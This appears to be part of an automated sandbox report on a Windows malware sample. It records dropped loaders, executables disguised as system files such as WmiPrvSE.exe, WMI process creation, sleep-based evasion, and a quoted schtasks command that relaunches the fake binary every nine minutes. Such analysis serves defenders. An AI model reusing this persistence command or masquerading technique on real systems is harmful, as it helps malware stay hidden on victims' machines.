            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, nEbJRIXyuBuyrOHf9kH.csHigh entropy of concatenated method names: 'pbKk15CgI8', 'oh2k4jr9x1', 'vOgkaQUnwTpmoX6W97a', 'wiL134UOmpVFjrBYoZd', 'zheKBIUUc69kw750oLA', 'HYXMMqUmtwBqtPkwod9', 'Tv3qofULbkEbJALXxdZ', 'qyxoApUQXAKeN3s59iu', 'uW8q2CU8jiOjNoUOfvU', 'o2x8h6U3eDC4JkRBcIF'

            Persistence and Installation Behavior

            Source: C:\msPortRefnetdhcp\componentWininto.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\cmd.exe Executable created and started: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exe File created: C:\Users\user\AppData\Local\Temp\CyberLoader.exe
            Source: C:\msPortRefnetdhcp\componentWininto.exe File created: C:\Recovery\zufsVvjyWcGfJF.exe
            Source: C:\Users\user\Desktop\4c6fK85tK7.exe File created: C:\Users\user\AppData\Local\Temp\ yberLoad.exe
            Source: C:\msPortRefnetdhcp\componentWininto.exe File created: C:\Users\Default\Downloads\WmiPrvSE.exe
            Source: C:\msPortRefnetdhcp\componentWininto.exe File created: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exe File created: C:\Users\user\AppData\Local\Temp\MVPLoader.exe
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exe File created: C:\msPortRefnetdhcp\componentWininto.exe

            Boot Survival

            Source: C:\msPortRefnetdhcp\componentWininto.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\Downloads\WmiPrvSE.exe'" /f
            Source: C:\Users\user\Desktop\4c6fK85tK7.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\msPortRefnetdhcp\componentWininto.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\msPortRefnetdhcp\componentWininto.exeMemory allocated: 3270000 memory reserve | memory write watch
            Source: C:\msPortRefnetdhcp\componentWininto.exeMemory allocated: 1B410000 memory reserve | memory write watch
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeMemory allocated: 1A60000 memory reserve | memory write watch
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeMemory allocated: 1B3C0000 memory reserve | memory write watch
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeMemory allocated: A00000 memory reserve | memory write watch
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeMemory allocated: 1A650000 memory reserve | memory write watch
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeMemory allocated: 1160000 memory reserve | memory write watch
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeMemory allocated: 1AE70000 memory reserve | memory write watch
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeMemory allocated: 1330000 memory reserve | memory write watch
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeMemory allocated: 1AE80000 memory reserve | memory write watch
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeMemory allocated: 13B0000 memory reserve | memory write watch
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeMemory allocated: 1ADC0000 memory reserve | memory write watch
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeMemory allocated: E10000 memory reserve | memory write watch
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeMemory allocated: 1A850000 memory reserve | memory write watch
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeMemory allocated: BF0000 memory reserve | memory write watch
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeMemory allocated: 1A900000 memory reserve | memory write watch
            Source: C:\msPortRefnetdhcp\componentWininto.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 600000
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 599874
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 599765
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 600000
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 599863
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 599750
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 599641
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 599531
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 600000
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 599883
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 599781
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 600000
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 599891
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 599766
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\msPortRefnetdhcp\componentWininto.exeWindow / User API: threadDelayed 2079
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeWindow / User API: threadDelayed 366
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeWindow / User API: threadDelayed 367
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeWindow / User API: threadDelayed 637
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWindow / User API: threadDelayed 1168
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWindow / User API: threadDelayed 1328
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWindow / User API: threadDelayed 668
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWindow / User API: threadDelayed 1755
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWindow / User API: threadDelayed 1171
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWindow / User API: threadDelayed 1161
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWindow / User API: threadDelayed 660
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWindow / User API: threadDelayed 1856
            Source: C:\msPortRefnetdhcp\componentWininto.exe TID: 7412Thread sleep count: 2079 > 30
            Source: C:\msPortRefnetdhcp\componentWininto.exe TID: 7404Thread sleep count: 43 > 30
            Source: C:\msPortRefnetdhcp\componentWininto.exe TID: 7388Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe TID: 7184Thread sleep count: 366 > 30
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe TID: 8180Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe TID: 4412Thread sleep count: 367 > 30
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe TID: 8188Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe TID: 7968Thread sleep count: 637 > 30
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe TID: 7908Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 7968Thread sleep count: 1168 > 30
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 7968Thread sleep count: 1328 > 30
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 1144Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 1144Thread sleep time: -600000s >= -30000s
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 1144Thread sleep time: -599874s >= -30000s
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 1144Thread sleep time: -599765s >= -30000s
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 8160Thread sleep time: -30000s >= -30000s
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 1364Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 4268Thread sleep count: 668 > 30
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 3752Thread sleep count: 1755 > 30
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 5040Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 5040Thread sleep time: -600000s >= -30000s
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 5040Thread sleep time: -599863s >= -30000s
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 5040Thread sleep time: -599750s >= -30000s
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 5040Thread sleep time: -599641s >= -30000s
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 5040Thread sleep time: -599531s >= -30000s
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 7828Thread sleep time: -30000s >= -30000s
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 3220Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 6160Thread sleep count: 1171 > 30
